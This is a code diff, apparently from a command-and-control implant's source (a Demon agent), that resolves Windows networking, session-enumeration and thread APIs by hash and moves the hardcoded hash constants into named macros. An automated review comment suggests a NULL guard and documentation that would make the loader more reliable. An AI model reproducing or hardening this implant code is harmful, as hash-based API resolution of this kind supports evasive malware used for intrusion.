Instance.Win32.NetWkstaUserEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetWkstaUserEnum );
Instance.Win32.NetSessionEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetSessionEnum );
Instance.Win32.NetShareEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetShareEnum );
Instance.Win32.NetApiBufferFree = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetApiBufferFree );
PUTS( "Loaded NetApi32 functions" )
}
if ( Instance.Modules.Ws2_32 )
{
Instance.Win32.WSAStartup = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x6128c683 );
Instance.Win32.WSACleanup = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x7f1aab78 );
Instance.Win32.WSASocketA = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x559f159a );
Instance.Win32.ioctlsocket = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x6dcd609 );
Instance.Win32.bind = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x7c9499e2 );
Instance.Win32.listen = LdrFunctionAddr( Instance.Modules.Ws2_32, 0xb794014 );
Instance.Win32.accept = LdrFunctionAddr( Instance.Modules.Ws2_32, 0xf15ae9b5 );
Instance.Win32.closesocket = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x494cb104 );
Instance.Win32.recv = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x7c9d4d95 );
Instance.Win32.send = LdrFunctionAddr( Instance.Modules.Ws2_32, 0x7c9ddb4f );
Instance.Win32.connect = LdrFunctionAddr( Instance.Modules.Ws2_32, 0xd3764dcf );
Instance.Win32.WSAStartup = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_WSAStartup );
Instance.Win32.WSACleanup = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_WSACleanup );
Instance.Win32.WSASocketA = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_WSASocketA );
Instance.Win32.ioctlsocket = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_ioctlsocket );
Instance.Win32.bind = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_bind );
Instance.Win32.listen = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_listen );
Instance.Win32.accept = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_accept );
Instance.Win32.closesocket = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_closesocket );
Instance.Win32.recv = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_recv );
Instance.Win32.send = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_send );
Instance.Win32.connect = LdrFunctionAddr( Instance.Modules.Ws2_32, FuncHash_connect );
PUTS( "Loaded Ws2_32 functions" )
}
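--- a/PATH_NOT_SHOWN_1
+++ b/PATH_NOT_SHOWN_1
@@ -40,9 +40,8 @@ BOOL WINAPI DllMain( HINSTANCE hDllBase, DWORD Reason, LPVOID Reserved )
 LPVOID,
 DWORD,
 LPDWORD
-) = LdrFunctionAddr( Kernel32, 0x7f08f451 ); /* this hash is for CreateThread in Kernel32.
-* you can load another function here using
-* LdrModulePeb or LdrModuleLoad then LdrFunctionAddr */
+) = LdrFunctionAddr( Kernel32, FuncHash_CreateThread ); /* you can load another function here using
+* LdrModulePeb or LdrModuleLoad then LdrFunctionAddr */
 NewThread( NULL, 0, DemonMain, hDllBase, 0, NULL );
 #endif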
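Review bot: The resolved pointer is still used unchecked: `LdrFunctionAddr( Kernel32, FuncHash_CreateThread )` presumably returns NULL when the lookup fails (missing export, or a wrong constant now that the value lives in Defines.h), and the next line calls through it, so a bad hash would fault inside DllMain instead of failing closed. Guard the call, e.g. `if ( NewThread ) { NewThread( NULL, 0, DemonMain, hDllBase, 0, NULL ); }`. The removed comment was the only place stating that this constant resolves CreateThread from Kernel32; that fact is now carried by the macro name alone, so a one-line `/* FuncHash_CreateThread: Kernel32!CreateThread */` beside the define in Defines.h would keep it discoverable when the hash list is regenerated. DllMain begins outside the hunk.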
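--- /dev/null
+++ b/PATH_NOT_SHOWN_2
@@ -0,0 +1,2 @@
+*
+!.gitignore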